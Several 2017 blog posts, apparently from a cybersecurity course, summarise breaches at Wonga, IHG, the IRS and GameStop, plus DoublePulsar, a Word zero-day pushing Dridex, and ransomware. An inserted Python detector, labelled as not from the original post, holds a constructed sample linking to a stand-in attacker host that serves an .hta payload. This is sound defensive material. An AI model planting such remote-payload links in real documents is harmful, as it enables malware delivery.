Saturday, April 29, 2017

Bug Bounty plus UK Data Breach

For Week 7 there have been some interesting news articles. Of course there is another data breach, but this one happened outside of the United States. The United States Air Force is following the other branches of the military and will start its own bug bounty program.
Bug Bounty
The United States Air Force has started a bug bounty program. The program is designed to pay hackers or security researchers to find vulnerabilities on its systems. The pay is based on the vulnerabilities found and how critical they are. Hackers and security researchers are invited from the United States and five other countries. The countries are the United Kingdom, Canada, Australia, and New Zealand (Kumar, 2017). For the “Hack the Air Force” program, people must go through a background check and not have a criminal record. The reason for the background check and the no-criminal-record requirement is that participants could access top secret materials and exfiltrate data. This will be one of the largest bug bounty programs put on by the United States military.
Allowing hackers inside the military network is a great idea! The best part is that if the hackers don’t find anything, the military doesn’t need to pay them. The last event, per the article, had over 14,000 hackers who found 138 vulnerabilities, and 75,000 dollars was paid out in reward money (Kumar, 2017). Giving hackers a chance to use their skills to get paid is awesome! Hackers usually break into systems or steal information because they are bored or they want to make more money. The problem with this is that vulnerabilities can be leaked or information taken if a person is not ethical. In the end, paying individuals instead of a company can result in more vulnerabilities being found, depending on the skill of the person.

Payday Loan Breach
A payday loan provider called Wonga has had its customers’ data stolen. Around 245,000 Wonga customers in the United Kingdom and 25,000 Wonga customers in Poland have been affected by the breach (Lomas, 2017). There is no information yet about how Wonga was broken into, but more information should come out in the following weeks. Wonga’s site has information about the data breach located at The hackers may have gotten access to people’s names, email addresses, home addresses, phone numbers, the last four digits of their credit or debit card numbers and/or bank account numbers, plus the sort codes (Lomas, 2017). Wonga believes that passwords weren’t taken during the incident, but as a safety precaution it wants everyone to change their passwords.
The data breach happened on April 7, 2017, but there has been no update as to how the hackers got in. They will not release the information because it could be damaging to the company. An educated guess would be that Wonga left a security hole in an external-facing site. United Kingdom businesses in 2018 are going to want to better protect their customers’ data because of an upcoming law. The new EU law will require companies to notify the data protection authorities within 3 days or face a fine of up to 10 million euros (Lomas, 2017). Some people have even said that the hackers won’t get much from the company’s customers because they don’t have much money. Without knowing how the breach occurred it is hard to say if the issue can be fixed.
If a company can’t hire its own internal security engineers, it needs to pay companies to look at its security. The internet is not going away, and with customers wanting more convenience, cyber security will only get more important. The United Kingdom implementing laws that require companies to report data breaches is a new concept. The United States does not have laws like the United Kingdom, but they are coming. Soon there will be a branch of the FBI that will investigate data breaches and issue fines if people’s personal information is not kept “up to code”. The other problem is that every company wants all types of information and most of it is not stored correctly. The way the information is stored in some industries is not regulated at the current moment in the United States.
Lomas, N. (2017, April 10). Payday loan firm Wonga suffers data breach affecting up to 270,000. Retrieved April 29, 2017, from

Kumar, M. (2017, April 27). Hack'em If You Can - U.S. Air Force launches Bug Bounty Program. Retrieved April 29, 2017, from

Sunday, April 23, 2017

IHG Data Breach and NSA Hacking Tools Week 6

For week 6 I have two items to discuss. The first is the IHG or InterContinental Hotels Group data breach and the second is how the leaked NSA tools are being used to attack Windows PCs. IHG had a breach back in December of 2016, and IHG said the data breach only affected a few of its properties. Now, in April 2017, IHG has released data showing that more than 1,000 IHG properties were affected by the data breach. IHG properties’ computer systems were compromised with malicious software designed to siphon customer debit and credit card data, just like Target and Home Depot (Krebs, 2017). IHG has been in the process of implementing a secure payment solution that will encrypt customers’ data end to end. Unfortunately, IHG only had a few sites done at the time of the data breach, and those were not affected. PCI has a requirement for point-to-point encryption, so it seems IHG is behind on its PCI requirements. At the following site, a person can look up which IHG properties were affected by the data breach and the dates. The site can be used by a person to see if their credit or debit card was affected and if they need to be on the lookout for fraudulent charges. Below is a screenshot of an email sent to franchise hotels offering a forensic investigation to be paid for by IHG (Krebs, 2017).

The leaked NSA hacking tools are being used in the wild. A hacker group called Shadow Brokers has leaked hacking tools that supposedly belonged to the NSA’s Equation Group (Khandelwal, 2017). A piece of malware designed by the NSA called DoublePulsar was one of the tools released by Shadow Brokers. DoublePulsar is being used as a spying tool, and it gets installed because of vulnerable SMB and RDP versions. DoublePulsar does not write any files to the computer, in order to remain stealthy, and it acts as a remote access Trojan. A person has released a Python script to test IP addresses to see if they have the DoublePulsar infection. The Python script is located at Below is a screenshot of someone who ran the Python script and found a computer infected with DoublePulsar.

Estimates of how many machines are affected have varied, but it seems at least 30,000 machines are infected. Microsoft has released patches to fix the SMB and RDP vulnerabilities. People who are still using end-of-life software such as Windows XP and Windows Server 2003 are vulnerable and will remain vulnerable because they will not receive security patches (Khandelwal, 2017). Script kiddies and other hackers will be able to freely use DoublePulsar to infect machines and make them zombies until the patch from Microsoft has been applied.
With hotels and businesses not encrypting credit card data end to end, data breaches will continue to happen. One item that will not show up in the news articles is how the malware got installed on the machines. Some organizations do not have good security, and I know for a fact that at one hotel the computers are not locked down at all. It seems organizations would rather have a data breach than pay for security because it is cheaper. People have the stigma that if a company has a data breach it is bad, but because so many are happening it is just another day. Look at Target and Home Depot; people still shop there after they have had a massive data breach. People will continue to stay at IHG properties, and if they have stock there may be a blip in it, but it will come back. At the end of the day, security needs to be a priority for businesses that store or transport customers’ data.
Krebs, B. (2017, April 18). Krebs on Security. Retrieved April 23, 2017, from

Khandelwal, S. (2017, April 22). Leaked NSA Hacking Tools Being Used to Hack Thousands of Vulnerable Windows PCs. Retrieved April 23, 2017, from

Wednesday, April 12, 2017

IRS Data Breach + Zero Day Week 5

During week 5 of CYBR 650 there has been plenty of security news. The blog this week will touch on a Microsoft zero day vulnerability and a data breach that happened at the IRS. This Microsoft zero day vulnerability is in Microsoft Office and allows remote code execution to take place. This vulnerability affects all current versions of Microsoft Office, which includes Office 2016. The vulnerability was first found by Ryan Hanson in July of 2016. McAfee reported the zero day on Friday, but said Microsoft has known about it since January (Goodin, 2017). Hackers are now using this vulnerability to spread banking malware called Dridex. A specially crafted Word document, once opened on a computer, allows an attacker to run code. The Word document containing a malicious OLE2link object is how the attack starts. This specific attack runs the exploit code, then makes a connection out to a remote server, where a malicious HTML application file or HTA gets downloaded (Khandelwal, 2017). Once the HTA file gets downloaded it runs and downloads different pieces of malware designed to gain control of the computer or steal credentials. Below is a screenshot of a phishing email that contains a malicious Word document.
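As an added example (not code from the original post or from any of the cited articles), the Python heuristic below scans a Word document for the two markers described above, an embedded OLE2link object and an outbound .hta URL, and flags the file only when both appear; the regexes, the part-size guard and the constructed sample files (including the placeholder hostname) are my own assumptions, not indicators taken from the post.

```python
import io
import re
import zipfile

# Heuristic markers taken from the write-up above: an OLE2link object inside
# the document and an outbound fetch of an HTML application (.hta) file.
OLE2LINK_RE = re.compile(rb"ole2link", re.IGNORECASE)
HTA_URL_RE = re.compile(rb"https?://[^\s\"'<>{}\\]+?\.hta\b", re.IGNORECASE)
MAX_PART_BYTES = 32 * 1024 * 1024  # guard against zip bombs inside a .docx

def _parts(blob: bytes):
    """Yield (name, bytes) for each part to scan: .docx is a zip, RTF is raw."""
    if blob[:2] == b"PK":
        with zipfile.ZipFile(io.BytesIO(blob)) as zf:
            for info in zf.infolist():
                if info.file_size > MAX_PART_BYTES:
                    continue  # skip oversized parts rather than inflate them
                yield info.filename, zf.read(info)
    else:
        yield "<raw>", blob

def scan_document(blob: bytes) -> dict:
    """Report the markers found; 'suspicious' needs both, matching the chain."""
    has_ole2link = False
    hta_urls = set()
    for _name, data in _parts(blob):
        if OLE2LINK_RE.search(data):
            has_ole2link = True
        for m in HTA_URL_RE.finditer(data):
            hta_urls.add(m.group(0).decode("latin-1"))
    return {"ole2link": has_ole2link,
            "hta_urls": sorted(hta_urls),
            "suspicious": has_ole2link and bool(hta_urls)}

# Constructed samples (not real malware, not from the post): a plain RTF and a
# docx-style zip that carries both markers, using a placeholder hostname.
BENIGN_RTF = b"{\\rtf1\\ansi Quarterly report, nothing embedded.}"

def build_sample_docx() -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("word/document.xml", "<w:document>Invoice attached</w:document>")
        zf.writestr("word/embeddings/oleObject1.bin", b"\x00\x01OLE2Link\x00")
        zf.writestr("word/_rels/document.xml.rels",
                    '<Relationship Target="http://attacker.invalid/t.hta" TargetMode="External"/>')
    return buf.getvalue()

if __name__ == "__main__":
    print(scan_document(BENIGN_RTF))  # {'ole2link': False, 'hta_urls': [], 'suspicious': False}
    print(scan_document(build_sample_docx()))
```

The heuristic is deliberately narrow: a document with only one of the two markers is reported but not flagged, so legitimate linked OLE objects do not trip it on their own.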

Microsoft released a patch yesterday to fix the vulnerability. This will stop the code from running if an email containing the Word document gets through the security controls. The worst part about this zero day is that Microsoft has known about it and did not fix it. The fix only came out after hackers were using it to spread malware by emailing a Word document. Proofpoint saw the new malware campaign and was able to block the malicious Word document.
The Internal Revenue Service or IRS has had a data breach that may affect up to 100,000 people. The IRS has a tool for FAFSA or Free Application for Federal Student Aid that hackers have exploited. The tool for FAFSA helped families and students complete the form because it is lengthy. Since I have gotten my associate’s and bachelor’s degrees and am currently getting my master’s, I have had to fill out the FAFSA forms. The FAFSA forms are long and are a pain to fill out. According to Krebs on Security, fraudsters may have been using the tool to get AGI or adjusted gross income (Krebs, 2017). The IRS has disabled the tool because people were starting to use it for fraud. The tool is called the IRS Data Retrieval Tool or DRT. John Koskinen went before the Senate Finance Committee to testify that fewer than 8,000 fraudulent returns were processed by the IRS (Cohn, 2017).
The good thing is the tool is expected to be back online, but not until October. Does the IRS run any penetration tests or security testing? It seems like their tools are put into production without any testing, and it is causing people to lose their personal information. The IRS needs to provide protection to the users that were affected by the breach. Companies that have had a data breach have provided identity theft protection, but the government does not provide these protections.
Goodin, D. (2017, April 11). Microsoft Word 0-day used to push dangerous Dridex malware on millions. Retrieved April 13, 2017, from
Cohn, M. (2017, April 10). Data breach of IRS student financial aid tool may have affected 100,000 taxpayers. Retrieved April 13, 2017, from
Krebs, B. (2017, March 21). Krebs on Security. Retrieved April 13, 2017, from
Khandelwal, S. (2017, April 11). Unpatched Microsoft Word Flaw is Being Used to Spread Dridex Banking Trojan. Retrieved April 13, 2017, from

Saturday, April 8, 2017

GameStop Breach + Ransomware

This week’s blog comes fresh off the press because a data breach happened yesterday. GameStop is looking into a possible data breach of its website. A third party notified GameStop that its customers’ credit card data was being sold on a website. Krebs’s financial sources say they have received alerts of fraud coming from GameStop’s website. This does not affect in-store purchases, only purchases made from GameStop’s website. According to Krebs, customer card numbers, expiration dates, names, addresses and card verification values (CVV2) were compromised (Krebs, 2017). The CVV2 is the three digit number on the back of credit and debit cards, which is used for security. Merchants are not supposed to store the CVV2 numbers, but that does not stop hackers from using software to get the number before it is encrypted (Petite, 2017). GameStop has hired a security firm to investigate the data breach that happened between September 2016 and February 2017.
GameStop told customers to basically watch their credit card and bank statements for unauthorized charges. The problem with looking at paper credit card and bank statements is they are monthly, which would give the bad guy plenty of time to buy items. If a person’s bank or credit card has a way to check purchases from an online interface (online banking), that would be a better way to check than paper statements. If the breach does turn out to be from GameStop, I would hope GameStop offers to replace all the credit and debit cards affected by the breach.
Without knowing more about the breach (I’m sure more will come out in a couple of weeks) it’s hard to say how the attackers were able to get the information. Most likely GameStop did not have security as part of building the website and there was a vulnerability which allowed the attackers access to the data. I will update the blog once more information has been shared. Lately it has been quiet, but there will be more data breaches in 2017.
Another subject I want to touch on is ransomware. A project called No More Ransom (NMR) started collecting decryption tools and keys for ransomware. The project was started by Europol, the Dutch National Police, Intel Security and Kaspersky Lab (Kumar, 2017). The project teaches users about ransomware and provides decryption tools so that users can get their files back. According to the article, the platform is available in 14 languages and it has over 40 free decryption tools (Kumar, 2017). The website is located at

With ransomware being the new way for attackers to make money, there have been several variants. I have only heard of CryptoLocker, CryptoWall, and Locky, but some other names are Cerber, Crysis, CTB-Locker, Jigsaw, KeRanger, LeChiffre, TeslaCrypt, TorrentLocker, and ZCryptor (Brunau, 2017). I found the Jigsaw ransomware name interesting and decided to do more research. Jigsaw is a nasty type of ransomware that gives a user three days to pay the 150 dollars in bitcoin, but there is more. Jigsaw will start deleting files every hour until the payment is received. If no payment is received, Jigsaw will delete all the encrypted files. If a person attempts to change registry settings or attempts to shut off the computer, Jigsaw will make the timer jump 24 hours ahead. A person is only given three chances before all the files are deleted.
A YouTube video, which can be found at the following link, shows how to decrypt Cerber ransomware. I’m glad the project No More Ransom was set up to help people decrypt their files. A default computer user has no safeguards to protect their computer against ransomware. With these tools users can get away without paying the attackers, and people paying is why ransomware is still around. Tips for home users to protect themselves from ransomware:
1. Ransomware mostly comes from emails, so be careful and watch for spam emails
2. Have two accounts, one for regular use and another made to install applications
3. Create backups using either backup software or online backups
Krebs, B. (2017, April 07). Krebs on Security. Retrieved April 08, 2017, from
Petite, S. (2017, April 07). customers' credit card information may have been compromised. Retrieved April 08, 2017, from
Kumar, M. (2017, April 05). No More Ransom - 15 New Ransomware Decryption Tools Available for Free. Retrieved April 08, 2017, from

Brunau, C. (2017, March 01). Common Types of Ransomware. Retrieved April 08, 2017, from